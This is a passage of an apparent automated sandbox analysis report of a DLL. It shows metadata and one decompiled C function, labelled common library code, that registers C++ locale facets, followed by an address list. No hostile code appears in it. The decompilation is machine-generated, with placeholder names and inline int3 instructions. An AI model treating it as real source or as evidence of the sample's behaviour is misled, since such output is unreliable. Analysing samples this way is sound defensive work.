                          • int.LIBCPMT ref: 6E20F781
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • moneypunct.LIBCPMT ref: 6E20F7A4
                          • std::_Facet_Register.LIBCPMT ref: 6E20F7BB
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F7DB
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F7F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
                          • String ID: xm,n
                          • API String ID: 113178234-1559963885
                          • Opcode ID: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
                          • Instruction ID: 8004293cadcf95e0c9dcf2b7f552294a58c66b67e777e9209cd1033daeb19f73
                          • Opcode Fuzzy Hash: ac68a556dcb167d71a36b1fe2792b94f77d70aa96ddf60b19f2c1d4de0dc03d9
                          • Instruction Fuzzy Hash: C211067A90051D9BCF01DBE0C898AEEB7BBAF44715F240908E410AB3D0DB749A44C792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F229, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E6E20F229(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t251;
				signed int _t252;
				void* _t264;
				void* _t277;
				void* _t290;
				void* _t303;
				void* _t316;
				void* _t329;
				void* _t342;
				void* _t355;
				void* _t368;
				void* _t381;
				void* _t394;
				void* _t407;
				void* _t420;
				void* _t433;
				void* _t446;
				void* _t459;
				signed int _t663;
				signed int _t718;
				signed int _t719;
				signed int _t720;
				signed int _t721;
				signed int _t722;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				signed int _t726;
				signed int _t727;
				signed int _t728;
				signed int _t729;
				signed int _t730;
				signed int _t731;
				signed int _t732;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				signed int _t747;
				signed int _t748;
				signed int _t749;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				void* _t770;

				_t715 = __edx;
				_t544 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t770 - 0x14, 0);
				_t735 =  *0x6e2c6db8; // 0x0
				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
				 *(_t770 - 0x10) = _t735;
				_t251 = E6E1E161C(0x6e2c6d6c);
				_t547 =  *((intOrPtr*)(_t770 + 8));
				_t252 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t251);
				_t717 = _t252;
				if(_t252 != 0) {
					L5:
					E6E2066BA(_t770 - 0x14);
					return E6E220075(_t717);
				} else {
					if(_t735 == 0) {
						_push( *((intOrPtr*)(_t770 + 8)));
						_push(_t770 - 0x10);
						__eflags = E6E210F1F(__ebx, _t547, __edx, _t717, _t735) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t770 - 0x20);
							E6E223D74(_t770 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t717, _t735, 0x14);
							E6E206653(_t770 - 0x14, 0);
							_t736 =  *0x6e2c6dec; // 0x0
							 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
							 *(_t770 - 0x10) = _t736;
							_t264 = E6E1E161C(0x6e2c6d98);
							_t554 =  *((intOrPtr*)(_t770 + 8));
							_t718 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t264);
							__eflags = _t718;
							if(_t718 != 0) {
								L12:
								E6E2066BA(_t770 - 0x14);
								return E6E220075(_t718);
							} else {
								__eflags = _t736;
								if(_t736 == 0) {
									_push( *((intOrPtr*)(_t770 + 8)));
									_push(_t770 - 0x10);
									__eflags = E6E210F87(_t544, _t554, __edx, _t718, _t736) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t770 - 0x20);
										E6E223D74(_t770 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t544, _t718, _t736, 0x14);
										E6E206653(_t770 - 0x14, 0);
										_t737 =  *0x6e2c6dbc; // 0x0
										 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
										 *(_t770 - 0x10) = _t737;
										_t277 = E6E1E161C(0x6e2c6d70);
										_t561 =  *((intOrPtr*)(_t770 + 8));
										_t719 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t277);
										__eflags = _t719;
										if(_t719 != 0) {
											L19:
											E6E2066BA(_t770 - 0x14);
											return E6E220075(_t719);
										} else {
											__eflags = _t737;
											if(_t737 == 0) {
												_push( *((intOrPtr*)(_t770 + 8)));
												_push(_t770 - 0x10);
												__eflags = E6E210FEF(_t544, _t561, __edx, _t719, _t737) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t770 - 0x20);
													E6E223D74(_t770 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t544, _t719, _t737, 0x14);
													E6E206653(_t770 - 0x14, 0);
													_t738 =  *0x6e2c6df0; // 0x0
													 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
													 *(_t770 - 0x10) = _t738;
													_t290 = E6E1E161C(0x6e2c6d9c);
													_t568 =  *((intOrPtr*)(_t770 + 8));
													_t720 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t290);
													__eflags = _t720;
													if(_t720 != 0) {
														L26:
														E6E2066BA(_t770 - 0x14);
														return E6E220075(_t720);
													} else {
														__eflags = _t738;
														if(_t738 == 0) {
															_push( *((intOrPtr*)(_t770 + 8)));
															_push(_t770 - 0x10);
															__eflags = E6E211057(_t544, _t568, _t715, _t720, _t738) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t770 - 0x20);
																E6E223D74(_t770 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t544, _t720, _t738, 0x14);
																E6E206653(_t770 - 0x14, 0);
																_t739 =  *0x6e2c6dc0; // 0x0
																 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																 *(_t770 - 0x10) = _t739;
																_t303 = E6E1E161C(0x6e2c6d74);
																_t575 =  *((intOrPtr*)(_t770 + 8));
																_t721 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t303);
																__eflags = _t721;
																if(_t721 != 0) {
																	L33:
																	E6E2066BA(_t770 - 0x14);
																	return E6E220075(_t721);
																} else {
																	__eflags = _t739;
																	if(_t739 == 0) {
																		_push( *((intOrPtr*)(_t770 + 8)));
																		_push(_t770 - 0x10);
																		__eflags = E6E2110BF(_t544, _t575, _t715, _t721, _t739) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t770 - 0x20);
																			E6E223D74(_t770 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t544, _t721, _t739, 0x14);
																			E6E206653(_t770 - 0x14, 0);
																			_t740 =  *0x6e2c6df8; // 0x0
																			 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																			 *(_t770 - 0x10) = _t740;
																			_t316 = E6E1E161C(0x6e2c6da4);
																			_t582 =  *((intOrPtr*)(_t770 + 8));
																			_t722 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t316);
																			__eflags = _t722;
																			if(_t722 != 0) {
																				L40:
																				E6E2066BA(_t770 - 0x14);
																				return E6E220075(_t722);
																			} else {
																				__eflags = _t740;
																				if(_t740 == 0) {
																					_push( *((intOrPtr*)(_t770 + 8)));
																					_push(_t770 - 0x10);
																					__eflags = E6E211127(_t544, _t582, _t715, _t722, _t740) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t770 - 0x20);
																						E6E223D74(_t770 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t544, _t722, _t740, 0x14);
																						E6E206653(_t770 - 0x14, 0);
																						_t741 =  *0x6e2c6df4; // 0x0
																						 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																						 *(_t770 - 0x10) = _t741;
																						_t329 = E6E1E161C(0x6e2c6da0);
																						_t589 =  *((intOrPtr*)(_t770 + 8));
																						_t723 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t329);
																						__eflags = _t723;
																						if(_t723 != 0) {
																							L47:
																							E6E2066BA(_t770 - 0x14);
																							return E6E220075(_t723);
																						} else {
																							__eflags = _t741;
																							if(_t741 == 0) {
																								_push( *((intOrPtr*)(_t770 + 8)));
																								_push(_t770 - 0x10);
																								__eflags = E6E2111AB(_t544, _t589, _t715, _t723, _t741) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1E1438(_t770 - 0x20);
																									E6E223D74(_t770 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e2683cf, _t544, _t723, _t741, 0x14);
																									E6E206653(_t770 - 0x14, 0);
																									_t742 =  *0x6e2c6dc8; // 0x0
																									 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																									 *(_t770 - 0x10) = _t742;
																									_t342 = E6E1E161C(0x6e2c6d7c);
																									_t596 =  *((intOrPtr*)(_t770 + 8));
																									_t724 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t342);
																									__eflags = _t724;
																									if(_t724 != 0) {
																										L54:
																										E6E2066BA(_t770 - 0x14);
																										return E6E220075(_t724);
																									} else {
																										__eflags = _t742;
																										if(_t742 == 0) {
																											_push( *((intOrPtr*)(_t770 + 8)));
																											_push(_t770 - 0x10);
																											__eflags = E6E211230(_t544, _t596, _t715, _t724, _t742) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E1E1438(_t770 - 0x20);
																												E6E223D74(_t770 - 0x20, 0x6e2c3504);
																												asm("int3");
																												E6E2200AC(0x6e2683cf, _t544, _t724, _t742, 0x14);
																												E6E206653(_t770 - 0x14, 0);
																												_t743 =  *0x6e2c6dc4; // 0x0
																												 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																												 *(_t770 - 0x10) = _t743;
																												_t355 = E6E1E161C(0x6e2c6d78);
																												_t603 =  *((intOrPtr*)(_t770 + 8));
																												_t725 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t355);
																												__eflags = _t725;
																												if(_t725 != 0) {
																													L61:
																													E6E2066BA(_t770 - 0x14);
																													return E6E220075(_t725);
																												} else {
																													__eflags = _t743;
																													if(_t743 == 0) {
																														_push( *((intOrPtr*)(_t770 + 8)));
																														_push(_t770 - 0x10);
																														__eflags = E6E2112B4(_t544, _t603, _t715, _t725, _t743) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E1E1438(_t770 - 0x20);
																															E6E223D74(_t770 - 0x20, 0x6e2c3504);
																															asm("int3");
																															E6E2200AC(0x6e2683cf, _t544, _t725, _t743, 0x14);
																															E6E206653(_t770 - 0x14, 0);
																															_t744 =  *0x6e2c6dd8; // 0x0
																															 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																															 *(_t770 - 0x10) = _t744;
																															_t368 = E6E1E161C(0x6e2c6d84);
																															_t610 =  *((intOrPtr*)(_t770 + 8));
																															_t726 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t368);
																															__eflags = _t726;
																															if(_t726 != 0) {
																																L68:
																																E6E2066BA(_t770 - 0x14);
																																return E6E220075(_t726);
																															} else {
																																__eflags = _t744;
																																if(_t744 == 0) {
																																	_push( *((intOrPtr*)(_t770 + 8)));
																																	_push(_t770 - 0x10);
																																	__eflags = E6E211339(_t544, _t610, _t715, _t726, _t744) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E1E1438(_t770 - 0x20);
																																		E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																		asm("int3");
																																		E6E2200AC(0x6e2683cf, _t544, _t726, _t744, 0x14);
																																		E6E206653(_t770 - 0x14, 0);
																																		_t745 =  *0x6e2c6db0; // 0x0
																																		 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																		 *(_t770 - 0x10) = _t745;
																																		_t381 = E6E1E161C(0x6e2c6d64);
																																		_t617 =  *((intOrPtr*)(_t770 + 8));
																																		_t727 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t381);
																																		__eflags = _t727;
																																		if(_t727 != 0) {
																																			L75:
																																			E6E2066BA(_t770 - 0x14);
																																			return E6E220075(_t727);
																																		} else {
																																			__eflags = _t745;
																																			if(_t745 == 0) {
																																				_push( *((intOrPtr*)(_t770 + 8)));
																																				_push(_t770 - 0x10);
																																				__eflags = E6E2113A1(_t544, _t617, _t715, _t727, _t745) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E1E1438(_t770 - 0x20);
																																					E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																					asm("int3");
																																					E6E2200AC(0x6e2683cf, _t544, _t727, _t745, 0x14);
																																					E6E206653(_t770 - 0x14, 0);
																																					_t746 =  *0x6e2c6ddc; // 0x0
																																					 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																					 *(_t770 - 0x10) = _t746;
																																					_t394 = E6E1E161C(0x6e2c6d88);
																																					_t624 =  *((intOrPtr*)(_t770 + 8));
																																					_t728 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t394);
																																					__eflags = _t728;
																																					if(_t728 != 0) {
																																						L82:
																																						E6E2066BA(_t770 - 0x14);
																																						return E6E220075(_t728);
																																					} else {
																																						__eflags = _t746;
																																						if(_t746 == 0) {
																																							_push( *((intOrPtr*)(_t770 + 8)));
																																							_push(_t770 - 0x10);
																																							__eflags = E6E211409(_t544, _t624, _t715, _t728, _t746) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E1E1438(_t770 - 0x20);
																																								E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																								asm("int3");
																																								E6E2200AC(0x6e2683cf, _t544, _t728, _t746, 0x14);
																																								E6E206653(_t770 - 0x14, 0);
																																								_t747 =  *0x6e2c6de0; // 0x0
																																								 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																								 *(_t770 - 0x10) = _t747;
																																								_t407 = E6E1E161C(0x6e2c6d8c);
																																								_t631 =  *((intOrPtr*)(_t770 + 8));
																																								_t729 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t407);
																																								__eflags = _t729;
																																								if(_t729 != 0) {
																																									L89:
																																									E6E2066BA(_t770 - 0x14);
																																									return E6E220075(_t729);
																																								} else {
																																									__eflags = _t747;
																																									if(_t747 == 0) {
																																										_push( *((intOrPtr*)(_t770 + 8)));
																																										_push(_t770 - 0x10);
																																										__eflags = E6E211471(_t544, _t631, _t715, _t729, _t747) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E1E1438(_t770 - 0x20);
																																											E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																											asm("int3");
																																											E6E2200AC(0x6e2683cf, _t544, _t729, _t747, 0x14);
																																											E6E206653(_t770 - 0x14, 0);
																																											_t748 =  *0x6e2c6dfc; // 0x0
																																											 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																											 *(_t770 - 0x10) = _t748;
																																											_t420 = E6E1E161C(0x6e2c6da8);
																																											_t638 =  *((intOrPtr*)(_t770 + 8));
																																											_t730 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t420);
																																											__eflags = _t730;
																																											if(_t730 != 0) {
																																												L96:
																																												E6E2066BA(_t770 - 0x14);
																																												return E6E220075(_t730);
																																											} else {
																																												__eflags = _t748;
																																												if(_t748 == 0) {
																																													_push( *((intOrPtr*)(_t770 + 8)));
																																													_push(_t770 - 0x10);
																																													__eflags = E6E2114EC(_t544, _t638, _t715, _t730, _t748) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1E1438(_t770 - 0x20);
																																														E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																														asm("int3");
																																														E6E2200AC(0x6e2683cf, _t544, _t730, _t748, 0x14);
																																														E6E206653(_t770 - 0x14, 0);
																																														_t749 =  *0x6e2c6dcc; // 0x0
																																														 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																														 *(_t770 - 0x10) = _t749;
																																														_t433 = E6E1E161C(0x6e2c6d80);
																																														_t645 =  *((intOrPtr*)(_t770 + 8));
																																														_t731 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t433);
																																														__eflags = _t731;
																																														if(_t731 != 0) {
																																															L103:
																																															E6E2066BA(_t770 - 0x14);
																																															return E6E220075(_t731);
																																														} else {
																																															__eflags = _t749;
																																															if(_t749 == 0) {
																																																_push( *((intOrPtr*)(_t770 + 8)));
																																																_push(_t770 - 0x10);
																																																__eflags = E6E211558(_t544, _t645, _t715, _t731, _t749) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1E1438(_t770 - 0x20);
																																																	E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																	asm("int3");
																																																	E6E2200AC(0x6e2683cf, _t544, _t731, _t749, 0x14);
																																																	E6E206653(_t770 - 0x14, 0);
																																																	_t750 =  *0x6e2c6e00; // 0x0
																																																	 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																	 *(_t770 - 0x10) = _t750;
																																																	_t446 = E6E1E161C(0x6e2c6dac);
																																																	_t652 =  *((intOrPtr*)(_t770 + 8));
																																																	_t732 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t446);
																																																	__eflags = _t732;
																																																	if(_t732 != 0) {
																																																		L110:
																																																		E6E2066BA(_t770 - 0x14);
																																																		return E6E220075(_t732);
																																																	} else {
																																																		__eflags = _t750;
																																																		if(_t750 == 0) {
																																																			_push( *((intOrPtr*)(_t770 + 8)));
																																																			_push(_t770 - 0x10);
																																																			__eflags = E6E2115C4(_t544, _t652, _t715, _t732, _t750) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1E1438(_t770 - 0x20);
																																																				E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																				asm("int3");
																																																				E6E2200AC(0x6e2683cf, _t544, _t732, _t750, 0x14);
																																																				E6E206653(_t770 - 0x14, 0);
																																																				_t751 =  *0x6e2c6dd0; // 0x0
																																																				 *(_t770 - 4) =  *(_t770 - 4) & 0x00000000;
																																																				 *(_t770 - 0x10) = _t751;
																																																				_t459 = E6E1E161C(0x6e2c6d60);
																																																				_t659 =  *((intOrPtr*)(_t770 + 8));
																																																				_t733 = E6E1E171B( *((intOrPtr*)(_t770 + 8)), _t459);
																																																				__eflags = _t733;
																																																				if(_t733 != 0) {
																																																					L117:
																																																					E6E2066BA(_t770 - 0x14);
																																																					return E6E220075(_t733);
																																																				} else {
																																																					__eflags = _t751;
																																																					if(_t751 == 0) {
																																																						_push( *((intOrPtr*)(_t770 + 8)));
																																																						_push(_t770 - 0x10);
																																																						__eflags = E6E21162A(_t544, _t659, _t715, _t733, _t751) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							_t663 = _t770 - 0x20;
																																																							E6E1E1438(_t663);
																																																							E6E223D74(_t770 - 0x20, 0x6e2c3504);
																																																							asm("int3");
																																																							E6E2200AC(0x6e26851f, _t544, _t733, _t751, 4);
																																																							_t752 = _t663;
																																																							 *(_t770 - 0x10) = _t752;
																																																							 *((intOrPtr*)(_t752 + 4)) =  *((intOrPtr*)(_t770 + 0xc));
																																																							_push( *((intOrPtr*)(_t770 + 0x14)));
																																																							_t245 = _t770 - 4;
																																																							 *_t245 =  *(_t770 - 4) & 0x00000000;
																																																							__eflags =  *_t245;
																																																							 *_t752 = 0x6e26c0c4;
																																																							 *((char*)(_t752 + 0x28)) =  *((intOrPtr*)(_t770 + 0x10));
																																																							E6E21542F(_t544, _t663, _t715, _t733, _t752,  *_t245);
																																																							return E6E220075(_t752,  *((intOrPtr*)(_t770 + 8)));
																																																						} else {
																																																							_t733 =  *(_t770 - 0x10);
																																																							 *(_t770 - 0x10) = _t733;
																																																							 *(_t770 - 4) = 1;
																																																							E6E206FD3(__eflags, _t733);
																																																							 *0x6e26a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t733 + 4))))();
																																																							 *0x6e2c6dd0 = _t733;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t733 = _t751;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t732 =  *(_t770 - 0x10);
																																																				 *(_t770 - 0x10) = _t732;
																																																				 *(_t770 - 4) = 1;
																																																				E6E206FD3(__eflags, _t732);
																																																				 *0x6e26a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t732 + 4))))();
																																																				 *0x6e2c6e00 = _t732;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t732 = _t750;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t731 =  *(_t770 - 0x10);
																																																	 *(_t770 - 0x10) = _t731;
																																																	 *(_t770 - 4) = 1;
																																																	E6E206FD3(__eflags, _t731);
																																																	 *0x6e26a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t731 + 4))))();
																																																	 *0x6e2c6dcc = _t731;
																																																	goto L103;
																																																}
																																															} else {
																																																_t731 = _t749;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t730 =  *(_t770 - 0x10);
																																														 *(_t770 - 0x10) = _t730;
																																														 *(_t770 - 4) = 1;
																																														E6E206FD3(__eflags, _t730);
																																														 *0x6e26a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t730 + 4))))();
																																														 *0x6e2c6dfc = _t730;
																																														goto L96;
																																													}
																																												} else {
																																													_t730 = _t748;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t729 =  *(_t770 - 0x10);
																																											 *(_t770 - 0x10) = _t729;
																																											 *(_t770 - 4) = 1;
																																											E6E206FD3(__eflags, _t729);
																																											 *0x6e26a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t729 + 4))))();
																																											 *0x6e2c6de0 = _t729;
																																											goto L89;
																																										}
																																									} else {
																																										_t729 = _t747;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t728 =  *(_t770 - 0x10);
																																								 *(_t770 - 0x10) = _t728;
																																								 *(_t770 - 4) = 1;
																																								E6E206FD3(__eflags, _t728);
																																								 *0x6e26a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t728 + 4))))();
																																								 *0x6e2c6ddc = _t728;
																																								goto L82;
																																							}
																																						} else {
																																							_t728 = _t746;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t727 =  *(_t770 - 0x10);
																																					 *(_t770 - 0x10) = _t727;
																																					 *(_t770 - 4) = 1;
																																					E6E206FD3(__eflags, _t727);
																																					 *0x6e26a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t727 + 4))))();
																																					 *0x6e2c6db0 = _t727;
																																					goto L75;
																																				}
																																			} else {
																																				_t727 = _t745;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t726 =  *(_t770 - 0x10);
																																		 *(_t770 - 0x10) = _t726;
																																		 *(_t770 - 4) = 1;
																																		E6E206FD3(__eflags, _t726);
																																		 *0x6e26a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t726 + 4))))();
																																		 *0x6e2c6dd8 = _t726;
																																		goto L68;
																																	}
																																} else {
																																	_t726 = _t744;
																																	goto L68;
																																}
																															}
																														} else {
																															_t725 =  *(_t770 - 0x10);
																															 *(_t770 - 0x10) = _t725;
																															 *(_t770 - 4) = 1;
																															E6E206FD3(__eflags, _t725);
																															 *0x6e26a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t725 + 4))))();
																															 *0x6e2c6dc4 = _t725;
																															goto L61;
																														}
																													} else {
																														_t725 = _t743;
																														goto L61;
																													}
																												}
																											} else {
																												_t724 =  *(_t770 - 0x10);
																												 *(_t770 - 0x10) = _t724;
																												 *(_t770 - 4) = 1;
																												E6E206FD3(__eflags, _t724);
																												 *0x6e26a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t724 + 4))))();
																												 *0x6e2c6dc8 = _t724;
																												goto L54;
																											}
																										} else {
																											_t724 = _t742;
																											goto L54;
																										}
																									}
																								} else {
																									_t723 =  *(_t770 - 0x10);
																									 *(_t770 - 0x10) = _t723;
																									 *(_t770 - 4) = 1;
																									E6E206FD3(__eflags, _t723);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t723 + 4))))();
																									 *0x6e2c6df4 = _t723;
																									goto L47;
																								}
																							} else {
																								_t723 = _t741;
																								goto L47;
																							}
																						}
																					} else {
																						_t722 =  *(_t770 - 0x10);
																						 *(_t770 - 0x10) = _t722;
																						 *(_t770 - 4) = 1;
																						E6E206FD3(__eflags, _t722);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t722 + 4))))();
																						 *0x6e2c6df8 = _t722;
																						goto L40;
																					}
																				} else {
																					_t722 = _t740;
																					goto L40;
																				}
																			}
																		} else {
																			_t721 =  *(_t770 - 0x10);
																			 *(_t770 - 0x10) = _t721;
																			 *(_t770 - 4) = 1;
																			E6E206FD3(__eflags, _t721);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t721 + 4))))();
																			 *0x6e2c6dc0 = _t721;
																			goto L33;
																		}
																	} else {
																		_t721 = _t739;
																		goto L33;
																	}
																}
															} else {
																_t720 =  *(_t770 - 0x10);
																 *(_t770 - 0x10) = _t720;
																 *(_t770 - 4) = 1;
																E6E206FD3(__eflags, _t720);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t720 + 4))))();
																 *0x6e2c6df0 = _t720;
																goto L26;
															}
														} else {
															_t720 = _t738;
															goto L26;
														}
													}
												} else {
													_t719 =  *(_t770 - 0x10);
													 *(_t770 - 0x10) = _t719;
													 *(_t770 - 4) = 1;
													E6E206FD3(__eflags, _t719);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t719 + 4))))();
													 *0x6e2c6dbc = _t719;
													goto L19;
												}
											} else {
												_t719 = _t737;
												goto L19;
											}
										}
									} else {
										_t718 =  *(_t770 - 0x10);
										 *(_t770 - 0x10) = _t718;
										 *(_t770 - 4) = 1;
										E6E206FD3(__eflags, _t718);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t718 + 4))))();
										 *0x6e2c6dec = _t718;
										goto L12;
									}
								} else {
									_t718 = _t736;
									goto L12;
								}
							}
						} else {
							_t717 =  *(_t770 - 0x10);
							 *(_t770 - 0x10) = _t717;
							 *(_t770 - 4) = 1;
							E6E206FD3(__eflags, _t717);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t717 + 4))))();
							 *0x6e2c6db8 = _t717;
							goto L5;
						}
					} else {
						_t717 = _t735;
						goto L5;
					}
				}
			}

























































                          0x6e20f229
                          0x6e20f229
                          0x6e20f230
                          0x6e20f23a
                          0x6e20f23f
                          0x6e20f24a
                          0x6e20f24e
                          0x6e20f251
                          0x6e20f256
                          0x6e20f25a
                          0x6e20f25f
                          0x6e20f263
                          0x6e20f2a8
                          0x6e20f2ab
                          0x6e20f2b7
                          0x6e20f265
                          0x6e20f267
                          0x6e20f26d
                          0x6e20f273
                          0x6e20f27b
                          0x6e20f27e
                          0x6e20f2bb
                          0x6e20f2c9
                          0x6e20f2ce
                          0x6e20f2d6
                          0x6e20f2e0
                          0x6e20f2e5
                          0x6e20f2f0
                          0x6e20f2f4
                          0x6e20f2f7
                          0x6e20f2fc
                          0x6e20f305
                          0x6e20f307
                          0x6e20f309
                          0x6e20f34e
                          0x6e20f351
                          0x6e20f35d
                          0x6e20f30b
                          0x6e20f30b
                          0x6e20f30d
                          0x6e20f313
                          0x6e20f319
                          0x6e20f321
                          0x6e20f324
                          0x6e20f361
                          0x6e20f36f
                          0x6e20f374
                          0x6e20f37c
                          0x6e20f386
                          0x6e20f38b
                          0x6e20f396
                          0x6e20f39a
                          0x6e20f39d
                          0x6e20f3a2
                          0x6e20f3ab
                          0x6e20f3ad
                          0x6e20f3af
                          0x6e20f3f4
                          0x6e20f3f7
                          0x6e20f403
                          0x6e20f3b1
                          0x6e20f3b1
                          0x6e20f3b3
                          0x6e20f3b9
                          0x6e20f3bf
                          0x6e20f3c7
                          0x6e20f3ca
                          0x6e20f407
                          0x6e20f415
                          0x6e20f41a
                          0x6e20f422
                          0x6e20f42c
                          0x6e20f431
                          0x6e20f43c
                          0x6e20f440
                          0x6e20f443
                          0x6e20f448
                          0x6e20f451
                          0x6e20f453
                          0x6e20f455
                          0x6e20f49a
                          0x6e20f49d
                          0x6e20f4a9
                          0x6e20f457
                          0x6e20f457
                          0x6e20f459
                          0x6e20f45f
                          0x6e20f465
                          0x6e20f46d
                          0x6e20f470
